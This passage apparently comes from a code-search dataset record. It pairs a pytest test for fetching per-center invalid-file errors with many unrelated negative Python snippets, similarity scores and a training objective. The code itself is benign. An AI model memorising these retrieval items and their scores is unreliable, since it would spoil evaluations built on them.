open(tmpcat).readlines()\n except:\n sxtlines = []\n del cmd,sproc,rmsfile,errs,tmpcat\n # refine that catalog, please\n objcat = imsci.split(\"_sci\")[0]+'.obj'\n projcat = imsci.split(\"_sci\")[0]+'.proj'\n fp = open(objcat,'w')\n ngood=0\n\n # the following seems very contrived, but helps in some cases\n if len(sxtlines)<250: bigMagerr = 0.4\n else: bigMagerr = 0.35\n self.logfile.write('cat: %s Magerr_lim: %.2f' %(objcat,bigMagerr))\n for line in sxtlines:\n flds = line.split()\n if len(flds)<9 or flds[0][0] == '#':\n continue\n mag = float(flds[3])\n magerr = float(flds[4])\n ellip = float(flds[5])\n fwhm = float(flds[6])\n a_im = float(flds[7])\n b_im = float(flds[8])\n if(magerr>bigMagerr or ellip>0.7 or b_im < 0.6 or max(a_im,fwhm/2)>400):\n continue\n fp.write(line)\n ngood += 1\n fp.close()\n if ngood>5:\n self.objcats.append(objcat)\n else:\n continue\n\n # finally, write the file with projected coord offsets\n cmd = 'project_coords %s 1 2 %.6f %.6f outfile=%s asec' \\\n %(objcat,self.RActr,self.Decctr,projcat)\n self.logfile.write(\"**> \"+cmd)\n projcoords = popen2.Popen4(cmd)\n _outlines = projcoords.fromchild.readlines()\n projcoords.fromchild.close()\n if len(_outlines) > 0:\n # I've never seen this happen, but better check...\n errtxt = \"ERROR: project_coords mysteriously failed!\"\n self.logfile.write(errtxt)\n self.errorList.append((self.modName,errtxt))\n for _line in _outlines:\n self.logfile.write(_line)\n print _line\n return -1\n self.projcats.append(projcat)\n self.logfile.write(\"Object astrometric catalog %s constructed.\"%projcat)\n del projcoords,cmd,objcat,projcat\n # ok, all done making catalogs for this image\n \n\tos.chdir(curdir)\n if len(self.objcats) < 1:\n self.logfile.write(\"makeObjCats: No catalogs made for matching?\")\n return -1\n self.logfile.write(\"Made %d object catalogs for matching.\"%len(self.objcats))\n return 0", "def _check_missing_files_in_folder(self, expected_list_of_files):\n missing_files = [\n file_name for file_name in expected_list_of_files if self.folder_path / file_name not in self._ome_tif_files\n ]\n assert (\n not missing_files\n ), f\"Some of the TIF image files at '{self.folder_path}' are missing. 
The list of files that are missing: {missing_files}\"", "def validate_matching_cif_files():\n for refcode in FRAMEWORKS_DF['CSD refcode'].str:\n assert Path(CIF_DIR / (str(refcode) + '.cif')).is_file", "def test_css_bottom_files_ordered(self):\n \n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n \n if len(bottom) > 1 and len(list_css_bottom_files()) > 1:\n for found_file in bottom:\n found_file_name = os.path.basename(found_file)\n \n \n for f_file_again in bottom:\n f_file_again_name = os.path.basename(f_file_again)\n \n if not found_file_name == f_file_again_name:\n if bottom.index(found_file) > bottom.index(f_file_again):\n self.assertGreater(list_css_bottom_files().index(found_file_name), list_css_bottom_files().index(f_file_again_name))\n \n if bottom.index(found_file) < bottom.index(f_file_again):\n self.assertLess(list_css_bottom_files().index(found_file_name), list_css_bottom_files().index(f_file_again_name))", "def check(self):\n if not os.path.exists(config.configured_root_path):\n raise c8e('root path of data set not exist' + config.configured_root_path)\n \n for it in config.configured_dirs:\n self.__path[it] = os.path.join(config.configured_root_path, it)\n \n for l1 in os.listdir(config.configured_root_path): #1st level directory: train/valid/test\n l1path = os.path.join(config.configured_root_path, l1)\n if not os.path.isdir(l1path):\n raise c8e('regular file exists in data set' + l1)\n \n if l1 not in config.configured_dirs:\n raise c8e('wrong dir in data set' + l1)\n \n for l2 in os.listdir(l1path): #2nd level directory, red/yellow/green\n l2path = os.path.join(l1path, l2)\n if not os.path.isdir(l2path):\n raise c8e('regular file exists in data set' + l2path)\n \n if l2 not in config.configured_classes:\n raise c8e('wrong dir in data set' + l2path)\n \n for l3 in os.listdir(l2path): #3rd level files \n self._check_image(l2path, l3)\n \n #statistic\n self.__phase_sample_count[l1] += 1\n self.__area_sample_count[l2] += 1\n if l1 == config.configured_train_dir:\n self.__train_sample_count[l2] += 1\n \n #process weight of each class of train directory\n total = np.sum(list(self.__train_sample_count.values())) \n max_samples = np.max(list(self.__train_sample_count.values())) #Max\n mu = 1. / (total / float(max_samples)) #\n keys = self.__train_sample_count.keys()\n for key in keys:\n score = math.log(mu * total / float(self.__train_sample_count[key]))\n self.__class_weight[int(key)] = score if score > 1. 
else 1.", "def check_names(treat, control, error_stream):\n tchrnames = set(treat.get_chr_names())\n cchrnames = set(control.get_chr_names())\n commonnames = tchrnames.intersection(cchrnames)\n if len(commonnames)==0:\n error_stream(\"No common chromosome names can be found from treatment and control!\")\n error_stream(\"Please make sure that the treatment and control alignment files were generated by using the same genome assembly!\")\n error_stream(\"Chromosome names in treatment: %s\" % \",\".join(sorted(tchrnames)))\n error_stream(\"Chromosome names in control: %s\" % \",\".join(sorted(cchrnames)))\n sys.exit()", "def test_check_cds_15(self):\n self.cds1.locus_tag = \"\"\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 2)", "def test_bulk_group_errors(self):\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_actg_missing_col)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n res = self.client.post(self.ag_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST", "def test_multiple_output_files(self):\r\n convert_fastaqual(self.fasta_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_id_s = [('PC.634', expected_fasta_634_default,\r\n expected_qual_634_default),\r\n ('PC.354', expected_fasta_354_default,\r\n expected_qual_354_default),\r\n ('PC.481', expected_fasta_481_default,\r\n expected_qual_481_default)]\r\n for sample_id, expected_fasta, expected_qual in sample_id_s:\r\n actual_output_fasta_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fna',\r\n self.output_dir)\r\n\r\n actual_output_qual_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.qual',\r\n self.output_dir)\r\n\r\n actual_output_fasta = open(actual_output_fasta_path)\r\n actual_output_qual = open(actual_output_qual_path)\r\n actual_fasta = actual_output_fasta.read()\r\n actual_output_fasta.close()\r\n actual_qual = actual_output_qual.read()\r\n actual_output_qual.close()\r\n self._files_to_remove.append(actual_output_fasta_path)\r\n self._files_to_remove.append(actual_output_qual_path)\r\n\r\n self.assertEquals(actual_fasta, expected_fasta)\r\n self.assertEquals(actual_qual, expected_qual)", "def check_analysis_pickle_files(self):\n # Make sure that there have been no more trials run since this\n # last processing. To do this, get the number of output files\n for basename in nsort(os.listdir(self.logdir)):\n m = self.labels.subdir_re.match(basename)\n if m is None or 'pckl' in basename:\n continue\n # Here is the output directory which contains the files\n subdir = os.path.join(self.logdir, basename)\n # Account for failed jobs. Get the set of file numbers that\n # exist for all h0 and h1 combinations\n self.get_set_file_nums(\n filedir=subdir\n )\n # Take one of the pickle files to see how many data\n # entries it has.\n data_sets = from_file(os.path.join(self.logdir,\n 'data_sets.pckl'))\n # Take the first data key and then the h0 fit to h0 fid\n # which should always exist. 
The length of this is then\n # the number of trials in the pickle files.\n if 'h0_fit_to_h0_fid' in data_sets[data_sets.keys()[0]].keys():\n pckl_trials = len(data_sets[data_sets.keys()[0]][\n 'h0_fit_to_h0_fid'].keys())\n # The number of pickle trials should match the number of\n # trials derived from the output directory.\n if self.num_trials == pckl_trials:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i trials. If '\n 'this seems incorrect please delete the files: '\n 'data_sets.pckl, all_params.pckl and labels.pckl '\n 'from the logdir you have provided.'%pckl_trials\n )\n pickle_there = True\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i trials. '\n 'However, based on the number of json files in the '\n 'output directory there should be %i trials in '\n 'these pickle files, so they will be regenerated.'%(\n pckl_trials, self.num_trials)\n )\n pickle_there = False\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script which do not seem to '\n 'contain any trials, so they will be regenerated.'\n )\n pickle_there = False\n \n return pickle_there", "def test_conformance_tests_test_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['tests/test_output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")" ]
[ "0.6594361", "0.6371965", "0.6179928", "0.617114", "0.613714", "0.61048645", "0.6091394", "0.6054181", "0.5993377", "0.5975022", "0.5965196", "0.5943787", "0.59276956", "0.5922497", "0.59199405", "0.5838658", "0.58281934", "0.58267826", "0.581185", "0.58048946", "0.57999486", "0.5792472", "0.5785924", "0.5777578", "0.5773663", "0.57687557", "0.57530075", "0.57375085", "0.57300115", "0.57296735", "0.572832", "0.5717879", "0.57006556", "0.56836", "0.568339", "0.56793153", "0.5677779", "0.5675142", "0.5665222", "0.5665006", "0.5652593", "0.5651594", "0.5649209", "0.5632348", "0.5632285", "0.56167144", "0.5614284", "0.5613409", "0.5611928", "0.5611853", "0.5606375", "0.5603455", "0.5595524", "0.55900383", "0.5584713", "0.5581431", "0.55802244", "0.5580214", "0.5574643", "0.5572647", "0.5570695", "0.5563555", "0.5558047", "0.55552876", "0.5553869", "0.55505824", "0.5550197", "0.5545005", "0.55421823", "0.55375487", "0.55375487", "0.5528488", "0.5521033", "0.5520872", "0.55185175", "0.55089426", "0.5504199", "0.5503655", "0.5502014", "0.5492092", "0.5473513", "0.5468844", "0.54681057", "0.5465701", "0.54635745", "0.5461801", "0.545886", "0.5454267", "0.54437804", "0.5443584", "0.54394233", "0.5437092", "0.5424845", "0.5422553", "0.5422045", "0.5418229", "0.5416893", "0.5416407", "0.541396", "0.5413547" ]
0.7143594
0
Test getting all center invalid errors
def test_get_center_invalid_errors(syn): with patch.object( syn, "tableQuery", return_value=QueryResponse ) as patch_query, patch.object( write_invalid_reasons, "_combine_center_file_errors", return_value="errors" ) as patch_combine: center_invalid = write_invalid_reasons.get_center_invalid_errors(syn, "syn3333") assert center_invalid == {"SAGE": "errors", "TEST": "errors"} patch_query.assert_called_once_with("SELECT * FROM syn3333") assert patch_combine.call_count == 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_errors(self) -> None:", "def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = []\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == 
\"Elevation\":\n\t\t\t\t\tlevelElevationEC = p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine = sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)", "def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors", "def getAll(self):\n x,y,a = self.getxya()\t\n xerrs = [self.errors[0][i] for i in range(len(self.x)) if self.x[i]!=None and self.y[i]!=None]\n yerrs = [self.errors[1][i] for i in range(len(self.x)) if self.x[i]!=None and self.y[i]!=None]\t\n return x,y,a,xerrs,yerrs", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def test_get_error_data_table_all_col_errors(self):\n field_setup = None\n error_names = None\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def test_get_error_data_all_col_errors(self):\n field_setup = None\n error_names = None\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def error(self) -> Sequence[float]:\n errors = []\n for line, sign in zip(self.marker_lines, (-1, 1)):\n if self._orientation == Orientation.UP_DOWN:\n picket_pos = 
self._fit(line.center.y)\n mlc_pos = line.center.x\n else:\n picket_pos = self._fit(line.center.x)\n mlc_pos = line.center.y\n if (\n self._separate_leaves\n ): # offset the picket position by the DLG and nominal gap\n mag_factor = self._image.sid / 1000\n picket_pos += (\n sign * self._nominal_gap_mm * mag_factor / 2 * self._image.dpmm\n )\n errors.append((mlc_pos - picket_pos) / self._image.dpmm)\n return errors", "def checks(self, error_margin=0.1):\n\n # Check all compartments are positive\n for label in self.labels:\n assert self.compartments[label] >= 0.", "def test_normalize_with_multiple_errors(self) -> None:\n errors_address = address_with_errors()\n try:\n normalize_an_address(errors_address)\n except ShipEngineError as err:\n assert err.request_id is not None\n assert err.request_id.startswith(\"req_\") is True\n assert err.source is ErrorSource.SHIPENGINE.value\n assert err.error_type is ErrorType.ERROR.value\n assert err.error_code is ErrorCode.INVALID_ADDRESS.value\n assert (\n err.message\n == \"Invalid address.\\nInvalid City, State, or Zip\\nInsufficient or Incorrect Address Data\"\n )", "def has_errors(self) -> bool:", "def test_check_cluster1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_cluster(cluster_fail_1)\n assert str(err_info.value) == 'cluster type input not within range of index'", "def test_kyc_get_validation_legal(self):\n pass", "def checkErrors(cHat, c):\n x, y, r = c[0], c[1], c[2]\n # Check if any circles are detected when they shouldn't be (false positive)\n if x == '-' or y =='-' or r == '-':\n if not(x == '-' or y =='-' or r == '-'):\n raise NullEntry()\n elif cHat is not None and len(cHat) >= 1:\n raise FalsePositiveDetection()\n elif math.isnan(float(c[0])) or math.isnan(float(c[1])) or math.isnan(float(c[2])):\n raise NaNError()\n # Check if circles weren't detected when they should have been (true negative)\n elif cHat is None:\n raise TrueNegativeDetection()", "def test_get_xy_invalid_space():\n pass", "def test_get_error_data_table_some_col_errors(self):\n field_setup = None\n error_names = ['first', 'billing_address_1', 'billing_country_area']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])\n pass", "def test__combine_center_file_errors(syn):\n expected_error = (\n f\"\\t{ENT1.name} ({ENT1.id}):\\n\\nmy errors\\nn\\n\\n\"\n f\"\\t{ENT1.name} ({ENT1.id}):\\n\\nerrors here\\nf\\n\\n\"\n )\n calls = [\n mock.call(\"syn1234\", downloadFile=False),\n mock.call(\"syn2345\", downloadFile=False),\n ]\n with patch.object(syn, \"get\", return_value=ENT1) as patch_synget:\n center_errors = write_invalid_reasons._combine_center_file_errors(\n syn, CENTER_ERRORSDF\n )\n assert center_errors == expected_error\n patch_synget.assert_has_calls(calls)", "def lat_errors(self):\r\n try:\r\n _lat_errors = self._validate_latlon(self.sourceLatCol)\r\n return _lat_errors\r\n except:\r\n return None", "def test_unfiltered_total_errors_detected(self):\n text_list, timestamps = pf.get_file(\"GenerateSRT.txt\")\n client = pf.initialize_api()\n sentences = pf.print_sentences(text_list)\n final_error_total = 0\n\n for i, token in enumerate(sentences):\n sequence_switched, end_matches, offset_list, err_message, sentence_error_total = \\\n edf.detect_errors(str(sentences[i]), client, True)\n\n final_error_total += sentence_error_total\n\n self.assertEqual(final_error_total, 6)", "def check_latlon(self):\n\n for station in 
list(self.station_list.values()):\n station_def = self.station_definitions[station.name]\n lat = float(station.get_obs('LAT')[0])\n lon = float(station.get_obs('LON')[0])\n lat_diff = abs(lat - station_def['lat'])\n lon_diff = abs(lon - station_def['lon'])\n if lat_diff > .1:\n qc_error.all_qc_errors.append(\n qce(\n station_name=station.name,\n error_code=9000,\n old_data_value=lat,\n explanation=\"lats are different for: \" + station.name +\n \". Old value : \" + str(station_def['lat'])\n ))\n if lon_diff > .1:\n qc_error.all_qc_errors.append(\n qce(\n station_name=station.name,\n error_code=9000,\n old_data_value=lon,\n explanation=\"lons are different for: \" + station.name +\n \". Old value : \" + str(station_def['lon'])\n ))", "def test_get_error_data_some_col_errors(self):\n field_setup = None\n error_names = ['first', 'billing_address_1', 'billing_country_area']\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])\n pass", "def check_errors(self, data):\n for entry in data:\n if entry.find('ERROR') != -1:\n return entry\n return False", "def check_get_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def __verify_root(self):\n output = self.output\n for key in self.data:\n if key != self.root:\n output[\"status\"] = False\n output[\"message\"] = \"{0} is not is the correct format.\"\n print(\"-- An Error Occurred -- {0}\".format(output[\"message\"]))\n break\n return output", "def test_check_invalid_centering():\n try:\n import pytest\n except:\n poppy._log.warning('Skipping test test_check_invalid_centering because pytest is not installed.')\n return # We can't do this test if we don't have the pytest.raises function.\n\n # MFT setup style and execute\n\n with pytest.raises(ValueError) as excinfo:\n mft = matrixDFT.MatrixFourierTransform(centering='some garbage value', verbose=True)\n assert excinfo.value.message == 'Error: centering method must be one of [SYMMETRIC, ADJUSTIBLE, FFTRECT, FFTSTYLE]'", "def errors(self) -> List[Error]:", "def testFailed(self):\r\n failedExprKeys = list(self.__testFailedExpressions.keys())\r\n for i in range(len(failedExprKeys)):\r\n for expr in self.__testFailedExpressions[failedExprKeys[i]]:\r\n self.__Calculator.setExpression(expr)\r\n self.__Calculator.calculateResult()\r\n self.assertEqual(self.__testErrors[failedExprKeys[i]], self.__Calculator.getError())", "def assert_no_error(self): \r\n Nx = self['Nx']\r\n Nt = self.m.Nt\r\n L, T = self.problem['L T'.split()]\r\n L = L/2 # only half the domain used (symmetry)\r\n x = np.linspace(0, L, Nx+1) # Mesh points in space \r\n t = np.linspace(0, T, Nt+1) # Mesh points in time\r\n \r\n for n in range(len(t)):\r\n u_e = self.problem.u_exact(x, t[n])\r\n diff = np.abs(self.f.u[n,:] - u_e).max()\r\n print 'diff:', diff\r\n tol = 1E-13\r\n assert diff < tol", "def calc_errors(test_data, loc_by_img):\n one_km_count = 0\n five_km_count = 0\n ten_km_count = 0\n hundred_km_count = 0\n thousand_km_count = 0\n other_count = 0\n for test_img in test_data:\n img_id = test_img['watchlink']\n img_result_loc = loc_by_img[img_id]\n img_actual_loc = Location(float(test_img['latitude']), float(test_img['longitude']))\n error = Location.dist(img_result_loc, img_actual_loc)\n if error < 1:\n one_km_count += 1\n elif error < 5:\n five_km_count += 1\n elif error < 10:\n ten_km_count += 1\n elif error < 100:\n hundred_km_count += 1\n elif error < 1000:\n thousand_km_count += 1\n else:\n other_count += 1\n 
return [one_km_count, five_km_count, ten_km_count, hundred_km_count, thousand_km_count, other_count]", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def getErrors(self):\n errorList = []\n\n # E0\n try:\n if not self.e0.isValid():\n errorList.append(\"Invalid first error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No first error axis in ErrorEllipse Class.\")\n\n # E1\n try:\n if not self.e1.isValid():\n errorList.append(\"Invalid second error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No second error axis in ErrorEllipse Class.\")\n\n # E2\n try:\n if not self.e2.isValid():\n errorList.append(\"Invalid third error axis in ErrorEllipse Class\")\n except (NameError, AttributeError):\n errorList.append(\"No third error axis in ErrorEllipse Class.\")\n\n # maximumHorizontalProjection\n try:\n self.maximumHorizontalProjection\n except (NameError, AttributeError):\n errorList.append(\"No MaximumHorizontalProjection in ErrorEllipse Class.\")\n\n # maximumVerticalProjection\n try:\n self.maximumVerticalProjection\n except (NameError, AttributeError):\n errorList.append(\"No MaximumVerticalProjection in ErrorEllipse Class\")\n\n # equivalentHorizontalRadius\n try:\n self.equivalentHorizontalRadius\n except (NameError, AttributeError):\n errorList.append(\"No EquivalentHorizontalRadius in ErrorEllipse class\")\n\n return errorList", "def check_set_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def measure_error_test(self):\n error_dict = self.results._determine_measured_error(\n score_threshold=0.5, plot=False\n )\n assert error_dict[\"mz_error\"] == [0, 0, 0]\n assert error_dict[\"intensity_error\"] == [0, 0, 0]", "def test_get_error_data_table_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def test_no_errors(self):\n test_error = \"\\r\\n--------------------------------------------------------------------\\r\\n\"\\\n \"Your code has been rated at 10.00/10 (previous run: 9.33/10, +0.67)\"\n\n self.assertEqual(\n format_errors(test_error),\n None\n )", "def _assert_cell_no_errors(c):\n if c['cell_type'] != 'code':\n return\n errors = [\"Error name: {}, Error Value: {}\".format(o[\"ename\"], o[\"evalue\"])\n for o in c['outputs']\n if o['output_type'] == 'error']\n\n assert not errors, errors", "def test_get_error_data_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])", "def check_errors(self):\n raise NotImplementedError(\"Implement it in a subclass.\")", "def test_notebook_no_errors(executed_notebook):\n for c in executed_notebook['cells']:\n _assert_cell_no_errors(c)", "def test_get_errorCode(self):\n for app_num, servo_type in app_nr.items():\n try:\n par = self.get_parameter(servo_type, app_num, ERROR_CODE_IDX, ERROR_CODE_SUB)\n param_obj = self.__dict__[servo_type]._get_errorCode()\n acs_par, completion = param_obj.get_sync()\n if(completion.code):\n print \"\\nError code found in errorCode...\"\n continue\n self.data_match(acs_par, par)\n except NackEx:\n continue", "def errors(self):\n raise NotImplementedError", "def 
test_filtered_total_errors_detected(self):\n text_list, timestamps = pf.get_file(\"GenerateSRT.txt\")\n client = pf.initialize_api()\n sentences = pf.print_sentences(text_list)\n final_error_total = 0\n\n for i, token in enumerate(sentences):\n sequence_switched, end_matches, offset_list, err_message, sentence_error_total = \\\n edf.detect_errors(str(sentences[i]), client, False)\n\n final_error_total += sentence_error_total\n\n self.assertEqual(final_error_total, 8)", "def testErrorChecking(self):\n discardLs = [17,18,19,20]\n table = {'row1':[1,2,3,4,5],'row2':[6,7,'7s',9,10],'row3':[11,12,13],'row4':[14,15,16]}\n blackJackObj = BlackJack()\n ## Overload Constructor\n blackJackObj.overloadConstructor(table, discardLs)\n self.assertEquals(True,blackJackObj.errorChecking('10')) # empty pos\n self.assertEquals(False,blackJackObj.errorChecking('8')) # taken pos\n self.assertEquals(False,blackJackObj.errorChecking('A')) # invalid input\n self.assertEquals(False,blackJackObj.errorChecking('21')) # out of range", "def get_errors(cursor):\n while True:\n message = cursor.lpop(\"errors\")\n if message is None:\n print(\"There are no errors more\")\n return None\n print(message)", "def test_get_counturingErr(self):\n for app_num, servo_type in app_nr.items():\n try:\n par = self.get_parameter(servo_type, app_num, COUNTURING_ERR_IDX, COUNTURING_ERR_SUB)\n param_obj = self.__dict__[servo_type]._get_counturingErr()\n acs_par, completion = param_obj.get_sync()\n if(completion.code):\n print \"\\nError code found in counturingErr...\"\n continue\n self.data_match(acs_par, par)\n except NackEx:\n continue", "def calculateErrors(cHat, c):\n print(cHat[0], c[0])\n xHat, yHat, rHat, x, y, r = float(cHat[0]), float(cHat[1]), float(cHat[2]), float(c[0]), float(c[1]), float(c[2])\n centerDistance = math.sqrt((xHat - x)**2 + (yHat - y)**2)\n radiusDistance = math.fabs(rHat - r)\n return centerDistance, radiusDistance", "def myError(Clasif, DataMatrixTrain, TagsArrayTrain, DataMatrixTest, TagsArrayTest):\n # Entrenamos, predecimos y calculamos los errores entre la prediccion\n # y el etiquetado que teniamos anteriormente\n Clasif.fit(DataMatrixTrain, TagsArrayTrain)\n predEtiq = Clasif.predLabel(DataMatrixTest)\n return 